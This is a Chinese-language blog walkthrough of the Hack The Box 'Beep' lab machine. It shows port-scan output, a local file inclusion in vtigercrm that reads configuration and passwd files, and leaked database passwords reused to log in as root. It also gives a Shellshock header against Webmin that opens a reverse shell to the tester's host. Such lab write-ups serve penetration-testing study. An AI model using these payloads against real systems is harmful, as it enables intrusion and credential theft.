HTB 学习笔记
【Hack The Box】linux练习-- beep
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月9日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
信息收集
nmap -sT -p- --min-rate 10000 10.129.68.60
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
443/tcp open https
941/tcp open unknown
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
4190/tcp open sieve
4445/tcp open upnotifyp
4559/tcp open hylafax
5038/tcp open unknown
10000/tcp open snet-sensor-mgmt
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 adee5abb6937fb27afb83072a0f96f53 (DSA)
|_ 2048 bcc6735913a18a4b550750f6651d6d0d (RSA)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.129.68.60/
110/tcp open pop3?
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 938/udp status
|_ 100024 1 941/tcp status
143/tcp open imap?
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
|_ssl-date: 2022-11-08T17:07:58+00:00; +1h00m00s from scanner time.
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.2.3 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
993/tcp open imaps?
995/tcp open pop3s?
3306/tcp open mysql?
4190/tcp open sieve?
4445/tcp open upnotifyp?
4559/tcp open hylafax?
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-trane-info: Problem with XML parsing of /evox/about
smtp枚举
http
这里更改一下,看下面这个
http://zh-cjh.com/zhuomianyunwei/1907.html
但我并不知道版本,不好利用,但是存在一个lfi比较有意思
通过分析exp,我们得知
lfi的产生点:/vtigercrm/graph.php?current_language=…/…/…/…/…/…/…/…//etc/amportal.conf%00&module=Accounts&action
首先访问该路径:是一大堆配置文件
右键查看源代码将给我们最好的观看体验
找到了好几个这样子的相同密码,接下来我们访问/etc/passwd来获取一下用户,而后进行爆破
但是在passwd中并没有发现除了root以外的任何用户(因为没有用户uid大于1000)
这个时候思考会不会是在给出的exp中我们漏掉了用户名?
再次去检查一下
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
密码确定了,而且这个应该还是3306的账号密码
用户是asteriskuser和admin,当然还有root,我们尝试一下登陆root
用户名root
密码:jEhdIekWmdjE
登陆成功,获取两个flag
第二种方法
我们来到10000端口
弱口令无效
我们进行一下目录爆破
这是cgi
https://10.10.10.7:10000/session_login.cgi
GET /session_login.cgi HTTP/1.1
Host: 10.10.10.7:10000
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.12/8081 0>&1
就这么使用即可,拿到的shell就是root
方法三(没完成)
freepbs是我们已知的比较脆弱的服务,但是我们需要找到他的入口
于是我搜了其他人的文章,发现了这个有意思的东西
我尝试可以下,确实可以